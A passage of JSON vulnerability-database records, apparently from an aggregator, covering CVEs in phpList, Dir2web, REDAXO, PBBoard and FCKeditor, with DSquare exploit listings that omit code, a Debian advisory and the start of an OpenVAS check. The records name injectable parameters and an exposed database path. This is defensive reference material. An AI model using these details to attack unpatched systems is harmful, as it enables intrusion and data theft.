"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3953", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phplist:phplist:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.9:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.16:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.8:*:*:*:*:*:*:*", 
"cpe:2.3:a:phplist:phplist:2.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.18:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.15:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.10:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.17:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:20", "description": "Cross-site scripting (XSS) vulnerability in admin/index.php in phpList before 2.10.19 allows remote attackers to inject arbitrary web script or HTML via the unconfirmed parameter to the user page.", "cvss3": {}, "published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-3952", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3952"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:phplist:phplist:2.10.18", "cpe:/a:phplist:phplist:2.10.13", "cpe:/a:phplist:phplist:2.8.2", "cpe:/a:phplist:phplist:2.10.16", "cpe:/a:phplist:phplist:2.10.17", "cpe:/a:phplist:phplist:2.7.2", "cpe:/a:phplist:phplist:2.10.7", "cpe:/a:phplist:phplist:2.10.4", 
"cpe:/a:phplist:phplist:2.6.5", "cpe:/a:phplist:phplist:2.10.9", "cpe:/a:phplist:phplist:2.10.10", "cpe:/a:phplist:phplist:2.10.12", "cpe:/a:phplist:phplist:2.10.1", "cpe:/a:phplist:phplist:2.10.8", "cpe:/a:phplist:phplist:2.10.14", "cpe:/a:phplist:phplist:2.10.2", "cpe:/a:phplist:phplist:2.10.15", "cpe:/a:phplist:phplist:2.10.5", "cpe:/a:phplist:phplist:2.7.1", "cpe:/a:phplist:phplist:2.10.11", "cpe:/a:phplist:phplist:2.8.7", "cpe:/a:phplist:phplist:2.8.12", "cpe:/a:phplist:phplist:2.10.3"], "id": "CVE-2012-3952", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3952", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phplist:phplist:2.10.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.4:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.9:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.14:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.3:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.16:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.8:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.13:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.18:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.15:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.8.12:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.10:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.5:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.17:*:*:*:*:*:*:*", "cpe:2.3:a:phplist:phplist:2.10.11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:29", "description": "SQL injection vulnerability in system/src/dispatcher.php in Dir2web 3.0 allows remote attackers to execute arbitrary SQL 
commands via the oid parameter in a homepage action to index.php.", "cvss3": {}, "published": "2012-08-12T17:55:00", "type": "cve", "title": "CVE-2012-4070", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4070"], "modified": "2012-08-13T04:00:00", "cpe": ["cpe:/a:dir2web:dir2web:3.0"], "id": "CVE-2012-4070", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4070", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:dir2web:dir2web:3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:29", "description": "Cross-site scripting (XSS) vulnerability in include/classes/class.rex_list.inc.php in REDAXO 4.3.x and 4.4 allows remote attackers to inject arbitrary web script or HTML via the subpage parameter to index.php.", "cvss3": {}, "published": "2012-08-13T20:55:00", "type": "cve", "title": "CVE-2012-3869", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3869"], "modified": "2012-08-14T04:00:00", "cpe": ["cpe:/a:redaxo:redaxo:4.3.3", 
"cpe:/a:redaxo:redaxo:4.4", "cpe:/a:redaxo:redaxo:4.3", "cpe:/a:redaxo:redaxo:4.3.2", "cpe:/a:redaxo:redaxo:4.3.1"], "id": "CVE-2012-3869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3869", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:redaxo:redaxo:4.4:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3:*:*:*:*:*:*:*", "cpe:2.3:a:redaxo:redaxo:4.3.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:27", "description": "Dir2web 3.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database via a direct request for system/db/website.db.", "cvss3": {}, "published": "2012-08-12T17:55:00", "type": "cve", "title": "CVE-2012-4069", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4069"], "modified": "2012-08-13T04:00:00", "cpe": ["cpe:/a:dir2web:dir2web:3.0"], "id": "CVE-2012-4069", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4069", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:dir2web:dir2web:3.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:59", "description": "Multiple SQL injection vulnerabilities in PBBoard 2.1.4 allow remote attackers to execute arbitrary SQL commands via the (1) username parameter to the send page, (2) email parameter to the forget page, (3) password parameter to the 
forum_archive page, (4) section parameter to the management page, (5) section_id parameter to the managementreply page, (6) member_id parameter to the new_password page, or (7) subjectid parameter to the tags page to index.php.", "cvss3": {}, "published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-4034", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:pbboard:pbboard:2.1.4"], "id": "CVE-2012-4034", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4034", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:47:22", "description": "Cross-site scripting (XSS) vulnerability in the print_textinputs_var function in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor 2.6.7 and earlier allows remote attackers to inject arbitrary web script or HTML via textinputs array parameters.", "cvss3": {}, "published": "2012-07-12T21:55:00", "type": "cve", "title": "CVE-2012-4000", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:ckeditor:fckeditor:1.6", "cpe:/a:ckeditor:fckeditor:0.9.5", "cpe:/a:ckeditor:fckeditor:2.6.3", "cpe:/a:ckeditor:fckeditor:0.9.0", "cpe:/a:ckeditor:fckeditor:2.2", "cpe:/a:ckeditor:fckeditor:1.2.2", "cpe:/a:ckeditor:fckeditor:0.9.2", "cpe:/a:ckeditor:fckeditor:2.5", "cpe:/a:ckeditor:fckeditor:1.0", "cpe:/a:ckeditor:fckeditor:2.1.1", "cpe:/a:ckeditor:fckeditor:2.3.3", "cpe:/a:ckeditor:fckeditor:2.3.2", "cpe:/a:ckeditor:fckeditor:2.3", "cpe:/a:ckeditor:fckeditor:0.9.4", "cpe:/a:ckeditor:fckeditor:2.5.1", "cpe:/a:ckeditor:fckeditor:2.6.7", "cpe:/a:ckeditor:fckeditor:1.4", "cpe:/a:ckeditor:fckeditor:2.4.1", "cpe:/a:ckeditor:fckeditor:2.6.2", "cpe:/a:ckeditor:fckeditor:1.1", "cpe:/a:ckeditor:fckeditor:1.2.4", "cpe:/a:ckeditor:fckeditor:2.4", "cpe:/a:ckeditor:fckeditor:1.3.1", "cpe:/a:ckeditor:fckeditor:2.6.4", "cpe:/a:ckeditor:fckeditor:2.1", "cpe:/a:ckeditor:fckeditor:2.6.5", "cpe:/a:ckeditor:fckeditor:2.0", "cpe:/a:ckeditor:fckeditor:2.6", "cpe:/a:ckeditor:fckeditor:1.3", "cpe:/a:ckeditor:fckeditor:0.9.1", "cpe:/a:ckeditor:fckeditor:2.4.2", "cpe:/a:ckeditor:fckeditor:2.3.1", "cpe:/a:ckeditor:fckeditor:2.4.3", "cpe:/a:ckeditor:fckeditor:2.6.1", "cpe:/a:ckeditor:fckeditor:1.5", "cpe:/a:ckeditor:fckeditor:0.8.5", "cpe:/a:ckeditor:fckeditor:0.9.3", "cpe:/a:ckeditor:fckeditor:1.2", "cpe:/a:ckeditor:fckeditor:2.6.4.1", "cpe:/a:ckeditor:fckeditor:0.8"], "id": "CVE-2012-4000", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4000", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ckeditor:fckeditor:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.2.2:*:*:*:*:*:*:*", 
"cpe:2.3:a:ckeditor:fckeditor:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.3:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.5:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.0:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.2:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.8.5:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.0:fc:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:fc:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.5:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.4:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6:rc:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.1:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.8:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.4:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.0:rc1:*:*:*:*:*:*", 
"cpe:2.3:a:ckeditor:fckeditor:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6:beta:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ckeditor:fckeditor:0.9.3:beta:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:48:01", "description": "Unrestricted file upload vulnerability in admin.php in PBBoard 2.1.4 allows remote administrators to execute arbitrary PHP code by uploading a file with an executable extension, then accessing it via a direct request to the file in the addons directory. NOTE: this vulnerability can be leveraged by remote attackers using CVE-2012-1216.", "cvss3": {}, "published": "2012-08-27T23:55:00", "type": "cve", "title": "CVE-2012-4036", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1216", "CVE-2012-4036"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:pbboard:pbboard:2.1.4"], "id": "CVE-2012-4036", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4036", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:20:47", "description": "SQL injection vulnerability in the CheckEmail function in 
includes/functions.class.php in PBBoard 3.0.1 before 20141128 allows remote attackers to execute arbitrary SQL commands via the email parameter in the register page to index.php. NOTE: the email parameter in the forget page vector is already covered by CVE-2012-4034.2.", "cvss3": {}, "published": "2014-12-05T15:59:00", "type": "cve", "title": "CVE-2014-9215", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034", "CVE-2014-9215"], "modified": "2018-10-09T19:55:00", "cpe": ["cpe:/a:pbboard:pbboard:3.0.1"], "id": "CVE-2014-9215", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9215", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:3.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T13:06:15", "description": "Cross-site scripting (XSS) vulnerability in editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php in FCKeditor before 2.6.11 and earlier allows remote attackers to inject arbitrary web script or HTML via an array key in the textinputs[] parameter, a different issue than CVE-2012-4000.", "cvss3": {}, "published": "2014-06-11T14:55:00", "type": "cve", "title": "CVE-2014-4037", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": 
"PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000", "CVE-2014-4037"], "modified": "2015-08-28T15:51:00", "cpe": ["cpe:/a:ckeditor:fckeditor:2.6.10"], "id": "CVE-2014-4037", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4037", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ckeditor:fckeditor:2.6.10:*:*:*:*:*:*:*"]}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerability in PBBoard index.php username parameter\n\nVulnerability Type: SQL Injection", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "PBBoard 2.1.4 username SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034"], "modified": "2014-11-30T00:00:00", "id": "E-413", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerability in PBBoard index.php email parameter\n\nVulnerability Type: SQL Injection", "cvss3": {}, "published": "2014-11-30T00:00:00", "type": "dsquare", "title": "PBBoard 2.1.4 email SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4034"], "modified": "2014-11-30T00:00:00", "id": "E-411", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T23:48:49", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2522-1 security@debian.org\nhttp://www.debian.org/security/ Yves-Alexis Perez\nAugust 05, 2012 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : fckeditor\nVulnerability : cross site scripting\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2012-4000\nDebian Bug : 683418\n\nEmilio Pinna discovered a cross site scripting vulnerability in the\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:2.6.6-1squeeze1.\n\nFor the testing distribution (wheezy), this problem has been fixed in\nversion 1:2.6.6-3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:2.6.6-3.\n\nWe recommend that you upgrade your fckeditor packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2012-08-06T08:22:53", "type": "debian", "title": "[SECURITY] [DSA 2522-1] fckeditor security update", 
"bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4000"], "modified": "2012-08-06T08:22:53", "id": "DEBIAN:DSA-2522-1:47EAF", "href": "https://lists.debian.org/debian-security-announce/2012/msg00163.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:38:41", "description": "The remote host is missing an update to fckeditor\nannounced via advisory DSA 2522-1.", "cvss3": {}, "published": "2012-08-10T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2522-1 (fckeditor)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231071499", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071499", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2522_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2522-1 (fckeditor)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71499\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_cve_id(\"CVE-2012-4000\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-10 03:20:46 -0400 (Fri, 10 Aug 2012)\");\n script_name(\"Debian Security Advisory DSA 2522-1 (fckeditor)\");\n script_category(ACT_GATHER_INFO);\n 